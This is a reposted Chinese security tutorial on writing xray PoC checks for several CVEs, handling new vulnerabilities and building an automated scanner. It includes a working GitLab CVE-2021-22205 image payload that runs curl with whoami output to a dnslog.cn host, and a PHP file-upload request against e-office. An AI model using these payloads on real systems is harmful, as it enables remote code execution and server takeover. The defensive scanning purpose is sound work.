<acronym id="s8ci2"><small id="s8ci2"></small></acronym>
<rt id="s8ci2"></rt><rt id="s8ci2"><optgroup id="s8ci2"></optgroup></rt>
<acronym id="s8ci2"></acronym>
<acronym id="s8ci2"><center id="s8ci2"></center></acronym>
0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

我的漏洞掃描及安全應急之道

jf_Fo0qk3ln ? 來源:FreeBuf.COM ? 2023-09-14 10:42 ? 次閱讀

編寫POC

以xray為例

學習文檔

先學習下相關文檔,大家挨個看一遍就行,有個印象即可,不用死記硬背。

如何編寫YAML格式POC

POC語法V2版

如何編寫高質量的 poc

BugScan 插件開發文檔

插件編寫

官方公布最基礎的POC如下

name: poc-yaml-example-com
# 腳本部分
transport: http
rules:
    r1:
        request:
            method: GET
            path: "/"
        expression: |
            response.status==200 && response.body.bcontains(b'Example Domain')
expression:
    r1()
# 信息部分
detail:
    author: name(link)
    links: 
        - http://example.com

編寫編輯器

poc實踐

CVE-2021-3654

路徑處理出了問題,網站域名加上//example.com/%2f..即可進行url跳轉

直接get請求,所以poc很簡單,有手就行。

name: poc-yaml-novnc-url-redirection-cve-2021-3654
manual: true
transport: http
rules:
  - method: GET
    path: "http://baidu.com/%2f.."
    follow_redirects: false
    expression: |
      response.headers['location']=="http://baidu.com/%2f../"
detail:
  author: txf(https://github.com/tangxiaofeng7)
  links:
    - https://seclists.org/oss-sec/2021/q3/188

CVE-2021-22205

exiftool解析造成的rce
一共發送2個請求

dff44200-5297-11ee-a25d-92fbcf53809c.jpg

請求1:

GET /users/sign_in HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

獲取csrf-token

請求2:

POST /uploads/user HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: xxx==
Cookie: xx
Content-Length: 879


------WebKitFormBoundaryIMv3mxRg59TkFSX5
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg

AT&TFORM?DJVMDIRM.?F????? !?N????k?D,q?I?n????"?FORM^DJVUINFO
dINCLshared_anno.iffBG44J???7?*?BG44??BG44
FORMDJVIANTaP(metadata
(Copyright "
" . qx{curl `whoami`.dnslog.cn} . 
" b ") )

------WebKitFormBoundaryIMv3mxRg59TkFSX5--

上傳圖片觸發rce。

由于xray目前支持的編碼解碼有限,不支持hex解碼,所以我們直接寫的簡單點,使用隨機字符進行判斷,poc很簡單,有手就行。

name: poc-yaml-gitlab-cve-2021-22205-rce
set:
  r1: randomInt(1, 9999)
  r2: randomInt(1, 9999)
manual: true
transport: http
rules:
  - method: GET
    path: "/users/sign_in"
    expression: response.status == 200
    search: >-
      name="csrf-token" content="(?P.+?)"
  - method: POST
    path: "/uploads/user"
    headers:
      X-CSRF-Token: |-
        {{token}}
      Content-Type: |-
        multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
      Accept: "*/*"
    body: |-
      ------WebKitFormBoundaryIMv3mxRg59TkFSX5
      Content-Disposition: form-data; name="file"; filename="{{r1}}.jpg"
      Content-Type: image/jpeg
      {{r2}}
      ------WebKitFormBoundaryIMv3mxRg59TkFSX5--
    expression: response.body.bcontains(b'Failed to process image')

detail:
  author: txf(https://github.com/tangxiaofeng7)
  links:
    - https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released

CVE-2021-27905

這是SSRF漏洞,需要使用反連平臺,加上reverse的即可,官方寫的很詳細了。所以poc很簡單,有手就行。

name: poc-yaml-solr-cve-2021-27905-ssrf
manual: true
transport: http
set:
  reverse: newReverse()
  reverseURL: reverse.url
rules:
  - method: GET
    path: "/solr/admin/cores?indexInfo=false&wt=json"
    expression: |
      response.status == 200
    search: >-
      "name":"(?P.+?)"
  - method: POST
    path: "/solr/{{name}}/replication/?command=fetchindex&masterUrl={{reverseURL}}"
    expression: |
      reverse.wait(5)
detail:
  author: txf(https://github.com/tangxiaofeng7)
  links:
    - https://github.com/murataydemir/CVE-2021-27905

0day應急

不管是甲方還是乙方,一旦暴出新漏洞,應急顯得非常重要。
大部分人都是直接寫poc批量檢測內部應用,當然我也不例外。

舉個例子:
泛微e-office 文件上傳漏洞風險通告(CNVD-2021-49104)

部署靶場環境

影響版本
泛微e-office V9.0
首先虛擬機安裝下。
e00e5104-5297-11ee-a25d-92fbcf53809c.jpg
安裝完成后,默認賬號admin,密碼為空。

POC構造

Burpsuite原始包文

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 10.211.55.11:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.211.55.11:8080/login.php
Cookie: LOGIN_LANG=cn; PHPSESSID=c57f0b37a12cf9dd61e35b909289d1b9
Pragma: no-cache
Cache-Control: no-cache
Content-Type: multipart/form-data;boundary=e64bdf16c554bbc109cecef6451c26a4
Content-Length: 191

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test1.php"
Content-Type: image/jpeg

123

--e64bdf16c554bbc109cecef6451c26a4--

訪問上傳的文件是否生效
e02e7f60-5297-11ee-a25d-92fbcf53809c.jpg

編寫poc

name: poc-yaml-e-office-v9-upload-getshell
manual: true
transport: http
set:
    r1: randomLowercase(8)
rules:
    r1:
        request:
            cache: true
            method: POST
            path: /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
            headers:
                Content-Type: multipart/form-data;boundary=e64bdf16c554bbc109cecef6451c26a4
            body: |-
                --e64bdf16c554bbc109cecef6451c26a4
                Content-Disposition: form-data; name="Filedata"; filename="{{r1}}.php"
                Content-Type: image/jpeg

                {{r1}}
                --e64bdf16c554bbc109cecef6451c26a4--
        expression: response.status == 200 && response.body.bcontains(b"logo-eoffice.php")
    r2:
        request:
            cache: true
            method: GET
            path: /images/logo/logo-eoffice.php
        expression: response.status == 200 && response.body.bcontains(bytes(r1))
expression: r1() && r2()
detail:
    author: test
    links:
        - https://github.com/chaitin/xray/pull/1540/files

XRAY批量

將需要掃描的url寫到url.txt里,然后執行如下命令。

./xray_darwin_amd64 webscan --poc "/Users/txf/poc/e-officev9-upload-getshell.yml" --url-file url.txt --html-output result.txt

e04905b0-5297-11ee-a25d-92fbcf53809c.jpg

DIY自動化掃描器

之前看了linglong(一款資產巡航掃描系統)的源碼,在他的基礎上重構了一些功能。
一起看看我是如何把xray加到自動化掃描器中。

掃描器開關

在linglong的基礎上,我為掃描器添加了開關。
e05efa3c-5297-11ee-a25d-92fbcf53809c.jpg
在代碼中定義了一個布爾值來做控制。

端口掃描

跟市面上掃描器意義,使用masscan去掃描存活端口,使用nmap進行端口的指紋識別。
原因:

1.Nmap在掃描數量較大的目標時性能緩慢

2.Masscan在高速率的掃描較大端口范圍時結果不太準確

web指紋掃描

直接用的開源的識別工具加到代碼里。

漏洞掃描

在進行xray漏洞掃描之前,先定義掃描目標的格式,代碼如下:
e08746cc-5297-11ee-a25d-92fbcf53809c.jpg

然后調用cmd終端執行xray掃描即可。
e0977092-5297-11ee-a25d-92fbcf53809c.jpg

結果通知

直接寫一個企業微信機器人的通知。
e0b13216-5297-11ee-a25d-92fbcf53809c.jpg

當然也可以用xray自帶的webhook通知,沒用過,這里感興趣的可以試試。

端口指紋界面:
e0d131ec-5297-11ee-a25d-92fbcf53809c.jpg

漏洞界面:

e0ef4a1a-5297-11ee-a25d-92fbcf53809c.jpg

當然如果是企業自查xray肯定可以開啟掃描,如果是SRC掃描的話不建議開xray去掃描,動靜太大了。

尾聲

如果針對外網掃描的話,建議再加上waf識別,cdn識別,否則效率會很低,還容易被封ip。

總的來說挖掘SRC,更重要的是信息收集。

這就是目前安全應急和漏洞掃描的方法,歡迎大家積極交流。

作者:tangxiaofeng7,轉載于FreeBuf.COM

審核編輯:湯梓紅

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • 漏洞掃描
    +關注

    關注

    0

    文章

    11

    瀏覽量

    7292
  • PoC
    PoC
    +關注

    關注

    1

    文章

    66

    瀏覽量

    20356
  • 編輯器
    +關注

    關注

    1

    文章

    793

    瀏覽量

    30529

原文標題:干貨|我的漏洞掃描及安全應急之道

文章出處:【微信號:菜鳥學信安,微信公眾號:菜鳥學信安】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    基于樹莓派2 blacktrack的系統漏洞掃描

    本帖最后由 weizhizhou 于 2017-4-30 00:06 編輯 基于樹莓派2 blacktrack的系統漏洞掃描對Linux系統開發有5年了,近期在blackberry2上移植把玩
    發表于 04-29 09:59

    安全瀏覽器竟然也被查出高危漏洞?開源安全問題不容忽視

    安全聯盟(www.cvecn.com)部分的解決了這些開源漏洞的定位問題。聯盟在其官網上提供免費二進制可執行文件掃描服務??梢詫xe, jar, apk, ipk, iso, bin, dll,dmg
    發表于 08-31 16:06

    安全瀏覽器竟然也被查出高危漏洞?開源安全問題不容忽視

    軟件里包含哪些開源組件,是否存在嚴重安全隱患。 中國開源安全聯盟(www.cvecn.com)部分的解決了這些開源漏洞的定位問題。聯盟在其官網上提供免費二進制可執行文件掃描服務??梢詫?/div>
    發表于 09-05 14:26

    漏洞真實影響分析,終結網絡安全的“狼來了”困境

    重要大會前夕接到要求對公司信息安全進行治理,從實際上解決以前欠下的安全“債務”,需要在一周內對已有的高危漏洞進行修復。在控制臺上可以看到已經掃描出了上萬個軟件
    發表于 12-25 15:18

    固件漏洞安全問題的解決辦法

    安全性?! 礼artner數據,截止2022年,約有70%未執行固件升級計劃的組織將由于固件漏洞而遭到入侵。而今年疫情的出現也導致了全球供應鏈不斷增加的中短期風險?!   」碳?b class='flag-5'>漏洞正逐年增加
    發表于 09-07 17:16

    怎么設計一款基于滲透性測試的Web漏洞掃描系統?

    Web漏洞掃描原理是什么?怎么設計一款基于滲透性測試的Web漏洞掃描系統?
    發表于 05-10 06:07

    一個基于漏洞掃描安全中間件架構設計

    本文結合漏洞掃描技術和安全中間件技術,提出了一種基于漏洞掃描安全中間件的系統結構。該系統將
    發表于 09-03 09:18 ?18次下載

    [代碼整潔之道].(美)馬丁.掃描

    電子發燒友網站提供《[代碼整潔之道].(美)馬丁.掃描版.txt》資料免費下載
    發表于 02-06 16:47 ?0次下載

    分解漏洞掃描,什么是漏洞掃描?

    5W2H?分解漏洞掃描 - WHAT WHAT?什么是漏洞掃描? 首先什么是漏洞? 國內外各種規范和標準中關于
    的頭像 發表于 10-12 16:38 ?1042次閱讀
    分解<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>,什么是<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>?

    分解漏洞掃描,為什么要做漏洞掃描呢?

    5W2H?分解漏洞掃描 - WHY WHY?為什么要做漏洞掃描呢? 降低資產所面臨的風險 上文提到漏洞的典型特征:系統的缺陷/弱點、可能被威
    的頭像 發表于 10-12 16:39 ?1123次閱讀
    分解<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>,為什么要做<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>呢?

    華為云VSS漏洞掃描服務為你排除Apache log4j2隱患

    華為云VSS漏洞掃描服務為你排除Apache log4j2隱患 近日Apache Log4j2漏洞持續發酵,已成為中國互聯網2021年年底前最大的安全事件。華為云VSS
    的頭像 發表于 10-13 13:52 ?799次閱讀
    華為云VSS<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>服務為你排除Apache log4j2隱患

    XSS漏洞掃描器工具

    XSpear是一款基于RubyGems的的XSS漏洞掃描器。擁有常見的XSS漏洞掃描攻擊測試功能。還可進行參數分析。
    的頭像 發表于 01-17 09:28 ?1341次閱讀

    市場上可用的十大最佳漏洞掃描工具

    OpenVAS漏洞掃描器是一種漏洞分析工具,由于其全面的特性,可以使用它來掃描服務器和網絡設備。這些掃描器將通過
    的頭像 發表于 03-08 09:49 ?3389次閱讀

    常見的漏洞掃描工具

    漏洞掃描工具是現代企業開展滲透測試服務中必不可少的工具之一,可以幫助滲透測試工程師快速發現被測應用程序、操作系統、計算設備和網絡系統中存在的安全風險與漏洞,并根據這些
    的頭像 發表于 06-28 09:42 ?1235次閱讀
    常見的<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>工具

    最常見的網絡安全12種漏洞掃描類型

    數據庫掃描技術主要用于評估數據庫系統的安全性,該類型會全面查找數據庫設置、訪問控制和存儲數據的漏洞,比如不安全的權限、漏洞注入問題或不
    發表于 07-12 12:41 ?1097次閱讀
    最常見的網絡<b class='flag-5'>安全</b>12種<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>類型
    亚洲欧美日韩精品久久_久久精品AⅤ无码中文_日本中文字幕有码在线播放_亚洲视频高清不卡在线观看
    <acronym id="s8ci2"><small id="s8ci2"></small></acronym>
    <rt id="s8ci2"></rt><rt id="s8ci2"><optgroup id="s8ci2"></optgroup></rt>
    <acronym id="s8ci2"></acronym>
    <acronym id="s8ci2"><center id="s8ci2"></center></acronym>